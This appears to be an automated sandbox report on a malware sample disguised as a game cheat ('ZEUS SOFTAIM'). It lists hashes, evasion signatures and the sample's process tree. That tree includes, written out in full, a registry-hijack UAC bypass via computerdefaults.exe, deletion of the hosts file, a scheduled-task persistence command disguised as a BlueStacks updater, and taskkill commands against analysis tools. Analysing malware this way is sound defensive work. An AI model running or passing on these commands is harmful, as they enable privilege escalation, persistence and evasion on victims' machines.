Overview

overview

9

Static

static

7

ZEUS SOFTA...ce.exe

windows7-x64

9

ZEUS SOFTA...ce.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    150s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 05:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ZEUS SOFTAIM!/RUN AS ADMIN/tranquil_radiance.exe

  • Size

    5.2MB

  • MD5

    5ed21aff5b09ec48e44a750e0abf4423

  • SHA1

    e83f10d045d00a18d17aeedb2b1901d223b9a00b

  • SHA256

    41e39eed1a999c27b61b2a9297ee969026fe9c5d7051c44c863a3bbafd07d4c5

  • SHA512

    418d26effcd36fb8fdb89e2a0dbe9e3f4cef52d67aa4de6cad2cf94a2f4cda0bd8fc896de81edd0e361938ee0ab899c70656d750e9d4e49aebeabc684909d646

  • SSDEEP

    98304:SuRHzIKiG/WxSFN0kqLto3Zt0z7QpU7kh2AOn6jz1PTMyCbj2:SczIKiGRD3b0z7QciZjpgy

Score
9/10
defense_evasiondiscoveryevasionthemidatrojan

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Themida packer 24 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies registry class 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe
    "C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\frAQBc8Wsa.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3792
      • C:\Users\Admin\AppData\Local\Temp\frAQBc8Wsa.exe
        "C:\Users\Admin\AppData\Local\Temp\frAQBc8Wsa.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1244
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\diorphone7189861.vbs" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:400
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4748
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C computerdefaults.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\SysWOW64\ComputerDefaults.exe
            computerdefaults.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4512
            • C:\Windows\SysWOW64\wscript.exe
              "wscript.exe" C:\Users\Admin\AppData\Local\Temp\diorphone7189861.vbs
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2248
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3956
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN BlueStacksUpdateHelper_AoKXaSik9IkJrGD008 /TR "C:\Users\Admin\AppData\Local\Microsoft\TypeScript\AoKXaSik9IkJrGD008.exe" /RL HIGHEST /IT
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2952
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Create /SC ONLOGON /TN BlueStacksUpdateHelper_AoKXaSik9IkJrGD008 /TR "C:\Users\Admin\AppData\Local\Microsoft\TypeScript\AoKXaSik9IkJrGD008.exe" /RL HIGHEST /IT
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2220
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 2008
          4⤵
          • Program crash
          PID:5080
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1092
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3332
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe" MD5
        3⤵
          PID:444
        • C:\Windows\system32\find.exe
          find /i /v "md5"
          3⤵
            PID:4468
          • C:\Windows\system32\find.exe
            find /i /v "certutil"
            3⤵
              PID:4172
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4736
            • C:\Windows\system32\taskkill.exe
              taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4536
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:592
            • C:\Windows\system32\taskkill.exe
              taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1996
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1244 -ip 1244
          1⤵
            PID:3972

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\diorphone7189861.vbs
            Filesize

            171B

            MD5

            a34267102c21aff46aecc85598924544

            SHA1

            77268af47c6a4b9c6be7f7487b2c9b233d49d435

            SHA256

            eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44

            SHA512

            5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\frAQBc8Wsa.exe
            Filesize

            11KB

            MD5

            599f14dd53faa32fefa3e2751aea1e1a

            SHA1

            c44aa18d9f8b150e7ae42193c1f1aefb36d91a3c

            SHA256

            d5996d0593c9fc0eac1fdc1da4be692f9ee0103b1151b43f71091679b2d6429f

            SHA512

            cf0bdc2edc089d6ba6ef4bdd694c301b40d39bb2a672524ac4695c1e86f29188965d6cd53fa6d290f90800b285353729517c4990a05340330f2f03855cdccc26

            Download Submit

          • memory/1244-20-0x00007FFC2E430000-0x00007FFC2E625000-memory.dmp

            Filesize

            2.0MB

            Download

          • memory/1244-17-0x0000000004FB0000-0x0000000005554000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/1244-16-0x0000000004960000-0x00000000049F2000-memory.dmp

            Filesize

            584KB

            Download

          • memory/1244-15-0x00000000000D0000-0x00000000000DA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/1244-14-0x00007FFC2E430000-0x00007FFC2E625000-memory.dmp

            Filesize

            2.0MB

            Download

          • memory/2620-8-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-24-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-9-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-7-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-6-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-5-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-2-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-3-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-4-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-1-0x00007FFC2E4D0000-0x00007FFC2E4D2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2620-21-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-22-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-23-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-0-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-25-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-26-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-27-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-28-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-29-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-30-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-31-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-32-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-33-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-34-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download

          • memory/2620-35-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

            Filesize

            13.4MB

            Download